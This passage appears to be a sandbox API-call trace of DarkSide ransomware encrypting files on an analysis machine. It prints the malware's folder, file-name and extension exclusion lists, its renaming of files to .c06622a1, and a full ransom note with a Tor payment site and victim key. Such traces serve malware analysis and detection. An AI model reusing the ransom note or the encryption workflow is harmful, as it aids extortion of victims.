(_String="tor browser") returned 0xb [0167.010] _wcsicmp (_Str1="windows.old", _Str2="iwvH BdfW9G") returned 14 [0167.010] wcslen (_String="windows.old") returned 0xb [0167.011] _wcsicmp (_Str1="intel", _Str2="iwvH BdfW9G") returned -9 [0167.011] wcslen (_String="intel") returned 0x5 [0167.011] _wcsicmp (_Str1="msocache", _Str2="iwvH BdfW9G") returned 4 [0167.011] wcslen (_String="msocache") returned 0x8 [0167.011] _wcsicmp (_Str1="perflogs", _Str2="iwvH BdfW9G") returned 7 [0167.011] wcslen (_String="perflogs") returned 0x8 [0167.011] _wcsicmp (_Str1="x64dbg", _Str2="iwvH BdfW9G") returned 15 [0167.011] wcslen (_String="x64dbg") returned 0x6 [0167.011] _wcsicmp (_Str1="public", _Str2="iwvH BdfW9G") returned 7 [0167.011] wcslen (_String="public") returned 0x6 [0167.011] _wcsicmp (_Str1="all users", _Str2="iwvH BdfW9G") returned -8 [0167.011] wcslen (_String="all users") returned 0x9 [0167.011] _wcsicmp (_Str1="default", _Str2="iwvH BdfW9G") returned -5 [0167.011] wcslen (_String="default") returned 0x7 [0167.011] wcscpy (in: _Dest=0x210e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*" [0167.011] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned 0x2c [0167.011] wcscpy (in: _Dest=0x210e76, _Source="iwvH BdfW9G" | out: _Dest="iwvH BdfW9G") returned="iwvH BdfW9G" [0167.011] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0167.011] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3230058 [0167.013] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" [0167.013] GetNamedSecurityInfoW () returned 0x0 [0167.013] SetEntriesInAclW () returned 0x0 [0167.013] SetNamedSecurityInfoW () returned 0x0 [0167.031] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22be88) returned 1 [0167.031] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.031] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g")) returned 1 [0167.031] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.031] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.032] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0167.033] CloseHandle (hObject=0x1bc) returned 1 [0167.033] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g")) returned 0x10 [0167.033] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\") returned="" [0167.033] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\") returned 0x37 [0167.033] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0167.033] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3acecf0, ftCreationTime.dwHighDateTime=0x1d5d7b3, ftLastAccessTime.dwLowDateTime=0x9141c500, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x9141c500, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.034] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5baaa640, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0xc894aca0, ftLastAccessTime.dwHighDateTime=0x1d5d977, ftLastWriteTime.dwLowDateTime=0xc894aca0, ftLastWriteTime.dwHighDateTime=0x1d5d977, nFileSizeHigh=0x0, nFileSizeLow=0x139b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="cYXPwSAdF9Yyy_t5H.png", cAlternateFileName="CYXPWS~1.PNG")) returned 1 [0167.034] _wcsicmp (_Str1="cYXPwSAdF9Yyy_t5H.png", _Str2="README.c06622a1.TXT") returned -15 [0167.034] wcsstr (_Str="cYXPwSAdF9Yyy_t5H.png", _SubStr="README") returned 0x0 [0167.034] _wcsicmp (_Str1="autorun.inf", _Str2="cYXPwSAdF9Yyy_t5H.png") returned -2 [0167.034] wcslen (_String="autorun.inf") returned 0xb [0167.034] _wcsicmp (_Str1="boot.ini", _Str2="cYXPwSAdF9Yyy_t5H.png") returned -1 [0167.034] wcslen (_String="boot.ini") returned 0x8 [0167.034] _wcsicmp (_Str1="bootfont.bin", _Str2="cYXPwSAdF9Yyy_t5H.png") returned -1 [0167.034] wcslen (_String="bootfont.bin") returned 0xc [0167.034] _wcsicmp (_Str1="bootsect.bak", _Str2="cYXPwSAdF9Yyy_t5H.png") returned -1 [0167.034] wcslen (_String="bootsect.bak") returned 0xc [0167.034] _wcsicmp (_Str1="desktop.ini", _Str2="cYXPwSAdF9Yyy_t5H.png") returned 1 [0167.034] wcslen (_String="desktop.ini") returned 0xb [0167.035] _wcsicmp (_Str1="iconcache.db", _Str2="cYXPwSAdF9Yyy_t5H.png") returned 6 [0167.035] wcslen (_String="iconcache.db") returned 0xc [0167.035] _wcsicmp (_Str1="ntldr", _Str2="cYXPwSAdF9Yyy_t5H.png") returned 11 [0167.035] wcslen (_String="ntldr") returned 0x5 [0167.035] _wcsicmp (_Str1="ntuser.dat", _Str2="cYXPwSAdF9Yyy_t5H.png") returned 11 [0167.035] wcslen (_String="ntuser.dat") returned 0xa [0167.035] _wcsicmp (_Str1="ntuser.dat.log", _Str2="cYXPwSAdF9Yyy_t5H.png") returned 11 [0167.035] wcslen (_String="ntuser.dat.log") returned 0xe [0167.035] _wcsicmp (_Str1="ntuser.ini", _Str2="cYXPwSAdF9Yyy_t5H.png") returned 11 [0167.035] wcslen (_String="ntuser.ini") returned 0xa [0167.035] _wcsicmp (_Str1="thumbs.db", _Str2="cYXPwSAdF9Yyy_t5H.png") returned 17 [0167.035] wcslen (_String="thumbs.db") returned 0x9 [0167.035] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0167.035] wcslen (_String="386") returned 0x3 [0167.035] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0167.035] wcslen (_String="adv") returned 0x3 [0167.035] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0167.035] wcslen (_String="ani") returned 0x3 [0167.035] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0167.035] wcslen (_String="bat") returned 0x3 [0167.035] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0167.035] wcslen (_String="bin") returned 0x3 [0167.035] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0167.035] wcslen (_String="cab") returned 0x3 [0167.035] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0167.035] wcslen (_String="cmd") returned 0x3 [0167.035] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0167.035] wcslen (_String="com") returned 0x3 [0167.035] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0167.035] wcslen (_String="cpl") returned 0x3 [0167.035] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0167.036] wcslen (_String="cur") returned 0x3 [0167.036] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0167.036] wcslen (_String="deskthemepack") returned 0xd [0167.036] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0167.036] wcslen (_String="diagcab") returned 0x7 [0167.036] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0167.036] wcslen (_String="diagcfg") returned 0x7 [0167.036] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0167.036] wcslen (_String="diagpkg") returned 0x7 [0167.036] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0167.036] wcslen (_String="dll") returned 0x3 [0167.036] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0167.036] wcslen (_String="drv") returned 0x3 [0167.036] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0167.036] wcslen (_String="exe") returned 0x3 [0167.036] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0167.036] wcslen (_String="hlp") returned 0x3 [0167.036] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0167.036] wcslen (_String="icl") returned 0x3 [0167.036] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0167.036] wcslen (_String="icns") returned 0x4 [0167.036] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0167.036] wcslen (_String="ico") returned 0x3 [0167.036] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0167.036] wcslen (_String="ics") returned 0x3 [0167.036] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0167.036] wcslen (_String="idx") returned 0x3 [0167.036] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0167.036] wcslen (_String="ldf") returned 0x3 [0167.036] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0167.036] wcslen (_String="lnk") returned 0x3 [0167.036] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0167.037] wcslen (_String="mod") returned 0x3 [0167.037] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0167.037] wcslen (_String="mpa") returned 0x3 [0167.037] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0167.037] wcslen (_String="msc") returned 0x3 [0167.037] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0167.037] wcslen (_String="msp") returned 0x3 [0167.037] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0167.037] wcslen (_String="msstyles") returned 0x8 [0167.037] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0167.037] wcslen (_String="msu") returned 0x3 [0167.037] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0167.037] wcslen (_String="nls") returned 0x3 [0167.037] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0167.037] wcslen (_String="nomedia") returned 0x7 [0167.037] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0167.037] wcslen (_String="ocx") returned 0x3 [0167.037] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0167.037] wcslen (_String="prf") returned 0x3 [0167.037] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0167.037] wcslen (_String="ps1") returned 0x3 [0167.037] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0167.037] wcslen (_String="rom") returned 0x3 [0167.037] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0167.037] wcslen (_String="rtp") returned 0x3 [0167.037] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0167.037] wcslen (_String="scr") returned 0x3 [0167.038] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0167.038] wcslen (_String="shs") returned 0x3 [0167.038] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0167.038] wcslen (_String="spl") returned 0x3 [0167.038] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0167.038] wcslen (_String="sys") returned 0x3 [0167.038] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0167.038] wcslen (_String="theme") returned 0x5 [0167.038] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0167.038] wcslen (_String="themepack") returned 0x9 [0167.038] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0167.038] wcslen (_String="wpx") returned 0x3 [0167.038] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0167.038] wcslen (_String="lock") returned 0x4 [0167.038] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0167.038] wcslen (_String="key") returned 0x3 [0167.038] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0167.038] wcslen (_String="hta") returned 0x3 [0167.038] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0167.038] wcslen (_String="msi") returned 0x3 [0167.038] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0167.038] wcslen (_String="pdb") returned 0x3 [0167.038] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0167.038] wcslen (_String="sqlite") returned 0x6 [0167.038] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g")) returned 0x10 [0167.038] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0167.038] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" [0167.038] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G") returned 0x36 [0167.039] wcscpy (in: _Dest=0x32500d6, _Source="cYXPwSAdF9Yyy_t5H.png" | out: _Dest="cYXPwSAdF9Yyy_t5H.png") returned="cYXPwSAdF9Yyy_t5H.png" [0167.039] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\cYXPwSAdF9Yyy_t5H.png", dwFileAttributes=0x80) returned 1 [0167.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\cYXPwSAdF9Yyy_t5H.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\cyxpwsadf9yyy_t5h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0167.039] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.039] ReadFile (in: hFile=0x1d0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0167.040] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x7cd25ead [0167.040] RtlComputeCrc32 (PartialCrc=0x5ead, Buffer=0x32e9a4, Length=0x80) returned 0x69420bb5 [0167.040] RtlComputeCrc32 (PartialCrc=0xbb5, Buffer=0x32e9a4, Length=0x80) returned 0x65d5885e [0167.040] RtlComputeCrc32 (PartialCrc=0x885e, Buffer=0x32e9a4, Length=0x80) returned 0x1ef33d97 [0167.040] RtlComputeCrc32 (PartialCrc=0x3d97, Buffer=0x32e9a4, Length=0x80) returned 0xe6d6be7 [0167.040] CloseHandle (hObject=0x1d0) returned 1 [0167.040] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3262070 [0167.041] wcscpy (in: _Dest=0x3262070, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\cYXPwSAdF9Yyy_t5H.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\cYXPwSAdF9Yyy_t5H.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\cYXPwSAdF9Yyy_t5H.png" [0167.041] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\cYXPwSAdF9Yyy_t5H.png") returned 0x4c [0167.041] wcscpy (in: _Dest=0x3262108, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.041] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\cYXPwSAdF9Yyy_t5H.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\cyxpwsadf9yyy_t5h.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\cYXPwSAdF9Yyy_t5H.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\cyxpwsadf9yyy_t5h.png.c06622a1"), dwFlags=0x8) returned 1 [0167.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\cYXPwSAdF9Yyy_t5H.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\cyxpwsadf9yyy_t5h.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0167.046] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.046] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0167.052] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6dded1a2 [0167.052] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7ae9c6ed [0167.052] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc66f47c [0167.052] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2be85ec2 [0167.052] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x51617214 [0167.052] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1052ce2e [0167.052] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc9507ad [0167.052] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7ed29a10 [0167.055] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0xaac31340 [0167.056] RtlComputeCrc32 (PartialCrc=0x1340, Buffer=0x710094, Length=0x80) returned 0x8a84e09d [0167.056] RtlComputeCrc32 (PartialCrc=0xe09d, Buffer=0x710094, Length=0x80) returned 0x9fd9f8c5 [0167.056] RtlComputeCrc32 (PartialCrc=0xf8c5, Buffer=0x710094, Length=0x80) returned 0xb5ec98fd [0167.056] RtlComputeCrc32 (PartialCrc=0x98fd, Buffer=0x710094, Length=0x80) returned 0x50bbc85e [0167.056] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.056] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0167.056] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3262070) returned 1 [0167.056] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3290fa00, ftCreationTime.dwHighDateTime=0x1d5db7b, ftLastAccessTime.dwLowDateTime=0xd70b7ff0, ftLastAccessTime.dwHighDateTime=0x1d5e333, ftLastWriteTime.dwLowDateTime=0xd70b7ff0, ftLastWriteTime.dwHighDateTime=0x1d5e333, nFileSizeHigh=0x0, nFileSizeLow=0xf6a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="laP3 _TZAjuy.bmp", cAlternateFileName="LAP3_T~1.BMP")) returned 1 [0167.056] _wcsicmp (_Str1="laP3 _TZAjuy.bmp", _Str2="README.c06622a1.TXT") returned -6 [0167.056] wcsstr (_Str="laP3 _TZAjuy.bmp", _SubStr="README") returned 0x0 [0167.056] _wcsicmp (_Str1="autorun.inf", _Str2="laP3 _TZAjuy.bmp") returned -11 [0167.056] wcslen (_String="autorun.inf") returned 0xb [0167.056] _wcsicmp (_Str1="boot.ini", _Str2="laP3 _TZAjuy.bmp") returned -10 [0167.056] wcslen (_String="boot.ini") returned 0x8 [0167.056] _wcsicmp (_Str1="bootfont.bin", _Str2="laP3 _TZAjuy.bmp") returned -10 [0167.056] wcslen (_String="bootfont.bin") returned 0xc [0167.056] _wcsicmp (_Str1="bootsect.bak", _Str2="laP3 _TZAjuy.bmp") returned -10 [0167.056] wcslen (_String="bootsect.bak") returned 0xc [0167.056] _wcsicmp (_Str1="desktop.ini", _Str2="laP3 _TZAjuy.bmp") returned -8 [0167.056] wcslen (_String="desktop.ini") returned 0xb [0167.056] _wcsicmp (_Str1="iconcache.db", _Str2="laP3 _TZAjuy.bmp") returned -3 [0167.056] wcslen (_String="iconcache.db") returned 0xc [0167.056] _wcsicmp (_Str1="ntldr", _Str2="laP3 _TZAjuy.bmp") returned 2 [0167.056] wcslen (_String="ntldr") returned 0x5 [0167.056] _wcsicmp (_Str1="ntuser.dat", _Str2="laP3 _TZAjuy.bmp") returned 2 [0167.056] wcslen (_String="ntuser.dat") returned 0xa [0167.057] _wcsicmp (_Str1="ntuser.dat.log", _Str2="laP3 _TZAjuy.bmp") returned 2 [0167.057] wcslen (_String="ntuser.dat.log") returned 0xe [0167.057] _wcsicmp (_Str1="ntuser.ini", _Str2="laP3 _TZAjuy.bmp") returned 2 [0167.057] wcslen (_String="ntuser.ini") returned 0xa [0167.057] _wcsicmp (_Str1="thumbs.db", _Str2="laP3 _TZAjuy.bmp") returned 8 [0167.057] wcslen (_String="thumbs.db") returned 0x9 [0167.057] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0167.057] wcslen (_String="386") returned 0x3 [0167.057] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0167.057] wcslen (_String="adv") returned 0x3 [0167.057] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0167.057] wcslen (_String="ani") returned 0x3 [0167.057] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0167.057] wcslen (_String="bat") returned 0x3 [0167.057] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0167.057] wcslen (_String="bin") returned 0x3 [0167.057] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0167.057] wcslen (_String="cab") returned 0x3 [0167.057] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0167.057] wcslen (_String="cmd") returned 0x3 [0167.057] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0167.057] wcslen (_String="com") returned 0x3 [0167.057] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0167.057] wcslen (_String="cpl") returned 0x3 [0167.057] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0167.057] wcslen (_String="cur") returned 0x3 [0167.057] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0167.057] wcslen (_String="deskthemepack") returned 0xd [0167.057] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0167.057] wcslen (_String="diagcab") returned 0x7 [0167.057] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0167.057] wcslen (_String="diagcfg") returned 0x7 [0167.058] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0167.058] wcslen (_String="diagpkg") returned 0x7 [0167.058] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0167.058] wcslen (_String="dll") returned 0x3 [0167.058] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0167.058] wcslen (_String="drv") returned 0x3 [0167.058] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0167.058] wcslen (_String="exe") returned 0x3 [0167.058] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0167.058] wcslen (_String="hlp") returned 0x3 [0167.058] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0167.058] wcslen (_String="icl") returned 0x3 [0167.058] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0167.058] wcslen (_String="icns") returned 0x4 [0167.058] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0167.058] wcslen (_String="ico") returned 0x3 [0167.058] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0167.058] wcslen (_String="ics") returned 0x3 [0167.058] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0167.058] wcslen (_String="idx") returned 0x3 [0167.058] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0167.058] wcslen (_String="ldf") returned 0x3 [0167.058] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0167.058] wcslen (_String="lnk") returned 0x3 [0167.058] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0167.058] wcslen (_String="mod") returned 0x3 [0167.058] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0167.058] wcslen (_String="mpa") returned 0x3 [0167.058] 